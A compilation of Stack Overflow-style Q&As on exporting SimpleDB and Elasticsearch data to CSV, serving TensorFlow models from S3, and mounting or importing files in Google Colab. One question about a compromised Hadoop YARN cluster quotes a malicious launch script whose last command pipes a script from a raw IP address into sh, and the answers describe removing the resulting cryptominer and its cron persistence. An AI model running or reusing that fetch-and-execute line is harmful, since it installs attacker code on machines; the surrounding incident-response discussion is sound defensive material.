How can I export data from SimpleDB to Excel or TextPad? - sql

I want to export data from SimpleDB to Excel or TextPad. How can I write a query for exporting data?
Thanks,
Senthil

You can use SDB Explorer to export the data into a CSV file, which you can open with your favorite editor.
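If you'd rather do it programmatically, here is a minimal, untested sketch using the legacy boto 2 library (which includes SimpleDB support); the domain name "data" and the output file name are placeholders:
# Hedged sketch: dump a SimpleDB domain to CSV with the legacy boto 2 library
# (pip install boto). Domain name "data" and output path are placeholders.
import csv
import boto

conn = boto.connect_sdb()            # reads AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY
domain = conn.get_domain('data')

rows, columns = [], set()
for item in domain.select('select * from `data`'):
    row = {'itemName()': item.name}  # keep the item name as its own column
    row.update(item)                 # boto SDB items behave like dicts of attributes
    columns.update(row.keys())
    rows.append(row)

with open('data.csv', 'w', newline='') as f:
    writer = csv.DictWriter(f, fieldnames=sorted(columns))
    writer.writeheader()
    writer.writerows(rows)           # open the resulting CSV in Excel or TextPad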

Sdbport is a Ruby gem that can export/import SimpleDB domains. It works across accounts and regions, and can be used as a class or as a standalone CLI.
On a system with Ruby installed (tested with 1.9.3p125):
Install sdbport:
gem install sdbport
Set your AWS credentials:
export AWS_ACCESS_KEY_ID=your_aws_key
export AWS_SECRET_ACCESS_KEY=your_aws_secret
Export SimpleDB domain from us-west-1:
sdbport export -a $AWS_ACCESS_KEY_ID -s $AWS_SECRET_ACCESS_KEY -r us-west-1 -n data -o /tmp/test-domain-dump
Import into a domain in us-east-1:
sdbport import -a $AWS_ACCESS_KEY_ID -s $AWS_SECRET_ACCESS_KEY -r us-east-1 -n data -i /tmp/test-domain-dump

You can export the content of your domain as XML using SDB Explorer.
For more details, please refer to our documentation page and watch the video.
Disclosure: I'm a developer of SDB Explorer.

Related

How to Export Data from AWS Elasticsearch Domain into a CSV File

I would like to know how to export indices from AWS Elasticsearch Domain into CSV files.
I appreciate any advice.
Please have a look at https://github.com/taraslayshchuk/es2csv.
You could do something like
es2csv -u https://your-aws-domain.region.es.amazonaws.com -i your_index_name -o csv_file.csv -r -q '{"query" : {"match_all" : {}}}'
Hope that helps.
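If you prefer a small script over the CLI, here is a hedged sketch using the elasticsearch-py client (7.x style) and Python's csv module. It assumes the domain accepts unsigned requests from your IP and that every document shares the same fields; the endpoint, index name, and output file are placeholders:
# Hedged sketch: pull every document from an index and write it to CSV.
# Assumes open (IP-based) access to the domain; request signing is not shown.
import csv
from elasticsearch import Elasticsearch
from elasticsearch.helpers import scan

es = Elasticsearch(
    hosts=[{"host": "your-aws-domain.region.es.amazonaws.com", "port": 443}],
    use_ssl=True,
)
hits = scan(es, index="your_index_name", query={"query": {"match_all": {}}})

with open("csv_file.csv", "w", newline="") as f:
    writer = None
    for hit in hits:
        doc = hit["_source"]
        if writer is None:  # build the header from the first document's fields
            writer = csv.DictWriter(f, fieldnames=sorted(doc.keys()))
            writer.writeheader()
        writer.writerow(doc)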

TensorFlow serving S3 and Docker

I'm trying to find a way to use TensorFlow Serving with the ability to add new models and new versions of models. Can I point TensorFlow Serving to an S3 bucket?
I also need it to run as a container. Is this possible, or do I need to implement another program that pulls down the model, adds it to a shared volume, and asks TensorFlow Serving to update the models on the file system?
Or do I need to build my own Docker image to be able to pull the content from S3?
I found that I could use the TF S3 connection settings (even though they aren't documented for the TF Serving Docker container). Example docker run command:
docker run -p 8501:8501 -e AWS_ACCESS_KEY_ID=$AWS_ACCESS_KEY_ID -e AWS_SECRET_ACCESS_KEY=$AWS_SECRET_ACCESS_KEY -e MODEL_BASE_PATH=s3://path/bucket/models -e MODEL_NAME=model_name -e S3_ENDPOINT=s3.us-west-1.amazonaws.com -e AWS_REGION=us-west-1 -e TF_CPP_MIN_LOG_LEVEL=3 -t tensorflow/serving
Note: the log level was set because of this bug.
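Once the container is up, you can sanity-check that the model was actually pulled from S3 by hitting the TF Serving REST API on the mapped port. A minimal hedged example (the model name matches MODEL_NAME above; the "instances" payload is a placeholder for your model's real input signature):
# Minimal sketch: query the REST endpoint exposed on port 8501 by the command above.
import requests

# model status endpoint (no payload needed); lists loaded versions and their state
status = requests.get("http://localhost:8501/v1/models/model_name", timeout=10)
print(status.json())

# prediction endpoint; adjust the "instances" payload to your model's input signature
payload = {"instances": [[1.0, 2.0, 3.0]]}   # hypothetical input
resp = requests.post("http://localhost:8501/v1/models/model_name:predict",
                     json=payload, timeout=10)
print(resp.json())                            # expect {"predictions": [...]}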
I've submitted a very detailed answer (but using DigitalOcean Spaces instead of S3), here:
How to deploy TensorFlow Serving using Docker and DigitalOcean Spaces
Since the implementation piggy-backs off an S3-like interface, I thought I'd add the link here in case someone needs a more comprehensive example.

Mount multiple drives in Google Colab

I use this function to mount my google drive
from google.colab import drive
drive.mount('/content/drive', force_remount=True)
and then copy files from it like this
!tar -C "/home/" -xvf '/content/drive/My Drive/files.tar'
I want to copy files from 2 drives, but when I try to run the first script again it just remounts my 1st drive.
How can I mount the 1st drive, copy files, then mount another drive and copy files from the 2nd drive?
Just in case anyone really needs to mount more than one drive, here's a workaround for mounting 2 drives.
First, mount the first drive using
from google.colab import drive
drive.mount('/drive1')
Then, use the following script to mount the second drive.
!apt-get install -y -qq software-properties-common python-software-properties module-init-tools
!add-apt-repository -y ppa:alessandro-strada/ppa 2>&1 > /dev/null
!apt-get update -qq 2>&1 > /dev/null
!apt-get -y install -qq google-drive-ocamlfuse fuse
from google.colab import auth
auth.authenticate_user()
from oauth2client.client import GoogleCredentials
creds = GoogleCredentials.get_application_default()
import getpass
!google-drive-ocamlfuse -headless -id={creds.client_id} -secret={creds.client_secret} < /dev/null 2>&1 | grep URL
vcode = getpass.getpass()
!echo {vcode} | google-drive-ocamlfuse -headless -id={creds.client_id} -secret={creds.client_secret}
!mkdir -p /drive2
!google-drive-ocamlfuse /drive2
Now, you will be able to access files from the first drive from /drive1/My Drive/ and those of the second drive from /drive2/ (the second method doesn't create the My Drive folder automatically).
Cheers!
Fun Fact: The second method was actually a commonly used method to mount Google drive in Colab environment before Google came out with google.colab.drive
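With both mounts in place, copying from either account is just ordinary file access; for example (paths are illustrative and match the mount points described above):
# Hedged example: both drives are now plain directories on the Colab VM.
import shutil

shutil.copy('/drive1/My Drive/files.tar', '/home/files_from_drive1.tar')   # first account
shutil.copy('/drive2/files.tar', '/home/files_from_drive2.tar')            # second account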
The colab drive module doesn't really support what you describe.
It might be simplest to share the files/folders you want to read from the second account's Drive to the first account's Drive (e.g. drive.google.com) and then read everything from the same mount.
If you're getting an exception with Suyog Jadhav's method:
MessageError: Error: credential propagation was unsuccessful
Follow steps 1 to 3 described by Alireza Mazochi:
https://stackoverflow.com/a/69881106/10214361
Follow these steps:
1- Run the below code:
!sudo add-apt-repository -y ppa:alessandro-strada/ppa 2>&1 > /dev/null
!sudo apt-get update -qq 2>&1 > /dev/null
!sudo apt -y install -qq google-drive-ocamlfuse 2>&1 > /dev/null
!google-drive-ocamlfuse
2- Give permissions to GFUSE
From the previous step, you will get an error like the one below. Click on the link in the error message and authenticate your account.
Failure("Error opening URL:https://accounts.google.com/o/oauth2/auth?client_id=... ")
3- Run the below code:
!sudo apt-get install -qq w3m # to act as web browser
!xdg-settings set default-web-browser w3m.desktop # to set default browser
%cd /content
!mkdir drive
%cd drive
!mkdir MyDrive
%cd ..
%cd ..
!google-drive-ocamlfuse /content/drive/MyDrive
After this step, you will have a folder with your second drive.
There is Rclone, which is a command-line program to manage files on cloud storage. It is a feature-rich alternative to cloud vendors' web storage interfaces. Over 40 cloud storage products support rclone, including S3 object stores, business and consumer file storage services, as well as standard transfer protocols.
The URL below shows how to set it up in Colab. You can even link OneDrive and other cloud storage products too.
https://towardsdatascience.com/why-you-should-try-rclone-with-google-drive-and-colab-753f3ec04ba1
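For orientation, the rclone route in a Colab cell looks roughly like this; the remote names "gdrive1"/"gdrive2" are placeholders created during the interactive "rclone config" step (authorizing each Google account), which is not reproduced here:
# Rough sketch of using rclone from a Colab cell; remote names are placeholders.
!curl -s https://rclone.org/install.sh | sudo bash
!rclone config                      # authorize each Google account once (headless flow)
!rclone copy gdrive1:files.tar /content/data/
!rclone copy gdrive2:files.tar /content/data/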

It seems that YARN is infected by a Trojan, even after I reinstall my computer?

Every time I start YARN, I find a task request that never finishes, but I can't get any log about it and I haven't found any error.
I also found a file in the temp directory named launch_container.sh, shown below:
#!/bin/bash
export NM_HTTP_PORT="8042"
export LOCAL_DIRS="/home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/application_1527211944644_0001"
export HADOOP_COMMON_HOME="/root/hadoop-2.8.3"
export JAVA_HOME="/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.181-2.6.14.8.el7_5.x86_64/jre"
export NM_AUX_SERVICE_mapreduce_shuffle="AAA0+gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
"
export HADOOP_YARN_HOME="/root/hadoop-2.8.3"
export HADOOP_TOKEN_FILE_LOCATION="/home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/application_1527211944644_0001/container_1527211944644_0001_02_000001/container_tokens"
export NM_HOST="VM_0_11_centos"
export APPLICATION_WEB_PROXY_BASE="/proxy/application_1527211944644_0001"
export JVM_PID="$$"
export USER="dr.who"
export HADOOP_HDFS_HOME="/root/hadoop-2.8.3"
export PWD="/home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/application_1527211944644_0001/container_1527211944644_0001_02_000001"
export CONTAINER_ID="container_1527211944644_0001_02_000001"
export HOME="/home/"
export NM_PORT="44381"
export LOGNAME="dr.who"
export APP_SUBMIT_TIME_ENV="1527212057989"
export MAX_APP_ATTEMPTS="2"
export HADOOP_CONF_DIR="/root/hadoop-2.8.3/etc/hadoop"
export MALLOC_ARENA_MAX="4"
export LOG_DIRS="/root/hadoop-2.8.3/logs/userlogs/application_1527211944644_0001/container_1527211944644_0001_02_000001"
exec /bin/bash -c "curl 185.222.210.59/x_wcr.sh | sh"
hadoop_shell_errorcode=$?
if [ $hadoop_shell_errorcode -ne 0 ]
then
exit $hadoop_shell_errorcode
fi
I found that it downloads something from a website. I have reinstalled my computer, switching from Ubuntu to CentOS, and the problem still exists, though I can't find the same problem on other computers. Is this normal, or is it a Trojan?
Please give some hints about how to fix this problem, thanks.
It's the same as on this site: "http://ist-deacuna-s1.syr.edu:8088/cluster/apps"
This situation appeared after I closed the port used by wget; when I open the port for wget again, it adds sessions that can't be seen by jps and can only be observed with the command
ps -ef|grep java
ubuntu 7484 1 97 07:16 ? 00:01:58 /var/tmp/java -c /var/tmp/w.conf
ubuntu 7496 1 96 07:16 ? 00:01:57 /var/tmp/java -c /var/tmp/w.conf
These two processes always consume all of my CPU.
This is a hack... they put a miner on your machine. I had the same thing, and here is how to get rid of it. They created a cron job that executes a remote sh file to re-install the miner if you remove it, so that must be deleted first. I found mine in
/var/spool/cron
Then you can delete the entire /var/tmp/ directory. Then kill the offending pids. Find them with
ps -Af | grep /tmp/
I am trying to figure out how they were able to access our machine to install this.
Check the file /var/tmp/java with --version. I had the same problem. My guess is that you will find XMRig.

Import a local file to Google Colab

I don't understand how Colab works with directories. I created a notebook, and Colab put it in /Google Drive/Colab Notebooks.
Now I need to import a file (data.py) where I have a bunch of functions I need. Intuition tells me to put the file in that same directory and import it with:
import data
but apparently that's not the way...
I also tried adding the directory to the set of paths, but I am specifying the directory incorrectly.
Can anyone help with this?
Thanks in advance!
Colab notebooks are stored on Google Drive, but they run on a separate virtual machine, so you need to copy your data.py there too. Do this to upload data.py through Colab:
from google.colab import files
files.upload()
# choose the file (data.py) on your computer; once it is uploaded, you can
import data
Google now officially provides support for accessing and working with Google Drive in Colab.
You can use the below code to mount your drive to Colab:
from google.colab import drive
drive.mount('/gdrive')
%cd /gdrive/My\ Drive/{location you want to move}
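After mounting, you can also make the Drive folder that holds data.py importable instead of changing directories; a small sketch (the folder name mirrors the default "Colab Notebooks" location mentioned in the question, so adjust it to wherever your file actually lives):
# Hedged sketch: put the Drive folder that holds data.py on the import path.
import sys
sys.path.append('/gdrive/My Drive/Colab Notebooks')   # adjust if data.py lives elsewhere

import data   # now resolves to the copy stored on Drive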
To easily upload a local file you can use the new Google Colab feature:
click on the right arrow on the left of your screen (below the Google Colab logo)
select the Files tab
click the Upload button
It will open a popup where you can choose a file to upload from your local filesystem.
To upload local files from your system to the Colab storage/directory:
from google.colab import files

def getLocalFiles():
    # files.upload() returns a dict of {filename: file contents as bytes}
    _files = files.upload()
    if len(_files) > 0:
        for k, v in _files.items():
            # write each uploaded file into the Colab VM's working directory
            open(k, 'wb').write(v)

getLocalFiles()
So, here is how I finally solved this. I have to point out, however, that in my case I had to work with several files and proprietary modules that were changing all the time.
The best solution I found was to use a FUSE wrapper to "link" Colab to my Google account. I used this particular tool:
https://github.com/astrada/google-drive-ocamlfuse
There is an example of how to set up your environment there, but here is how I did it:
# Install a Drive FUSE wrapper.
!apt-get install -y -qq software-properties-common python-software-properties module-init-tools
!add-apt-repository -y ppa:alessandro-strada/ppa 2>&1 > /dev/null
!apt-get update -qq 2>&1 > /dev/null
!apt-get -y install -qq google-drive-ocamlfuse fuse
# Generate auth tokens for Colab
from google.colab import auth
auth.authenticate_user()
# Generate creds for the Drive FUSE library.
from oauth2client.client import GoogleCredentials
creds = GoogleCredentials.get_application_default()
import getpass
!google-drive-ocamlfuse -headless -id={creds.client_id} -secret={creds.client_secret} < /dev/null 2>&1 | grep URL
vcode = getpass.getpass()
!echo {vcode} | google-drive-ocamlfuse -headless -id={creds.client_id} -secret={creds.client_secret}
At this point you'll have installed the wrapper, and the code above will generate a couple of links for you to authorize access to your Google Drive account.
Then you have to create a folder in the Colab file system (remember this is not persistent, as far as I know...) and mount your drive there:
# Create a directory and mount Google Drive using that directory.
!mkdir -p drive
!google-drive-ocamlfuse drive
print ('Files in Drive:')
!ls drive/
The !ls command will print the directory contents so you can check that it works, and that's it. You now have all the files you need and can make changes to them with no further complications. Remember that you may need to restart the kernel to update the imports and variables.
Hope this works for someone!
You can write the following commands in Colab to mount the drive:
from google.colab import drive
drive.mount('/content/gdrive')
and you can download a file from an external URL into the drive with a simple Linux command such as wget, like this:
!wget 'https://dataverse.harvard.edu/dataset'